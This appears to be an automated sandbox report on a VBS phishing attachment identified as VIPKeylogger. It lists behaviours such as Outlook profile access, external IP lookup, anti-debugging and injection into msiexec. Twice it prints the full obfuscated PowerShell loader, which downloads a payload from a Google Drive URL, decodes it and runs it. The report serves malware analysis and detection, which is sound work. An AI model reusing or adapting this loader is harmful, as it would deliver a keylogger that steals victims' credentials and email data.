Analysis Overview
SHA256
0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c
Threat Level: Known bad
The file 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c was found to be: Known bad.
Malicious Activity Summary
Vipkeylogger family
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Suspicious behavior: EnumeratesProcesses
outlook_office_path
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-04 05:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 05:40
Reported
2024-11-04 05:43
Platform
win7-20241010-en
Max time kernel
150s
Max time network
19s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 108 wrote to memory of 2896 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 108 wrote to memory of 2896 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 108 wrote to memory of 2896 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? 
romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe 
erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. 
GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
Network
Files
C:\Users\Admin\AppData\Local\Temp\Cab255E.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2896-20-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp
memory/2896-21-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-22-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-23-0x000000001B360000-0x000000001B642000-memory.dmp
memory/2896-24-0x00000000024E0000-0x00000000024E8000-memory.dmp
memory/2896-25-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-26-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-27-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-28-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp
memory/2896-29-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-30-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-31-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
memory/2896-32-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-04 05:40
Reported
2024-11-04 05:43
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2244 wrote to memory of 3032 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2244 wrote to memory of 3032 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 1620 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? 
romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe 
erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. 
GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV 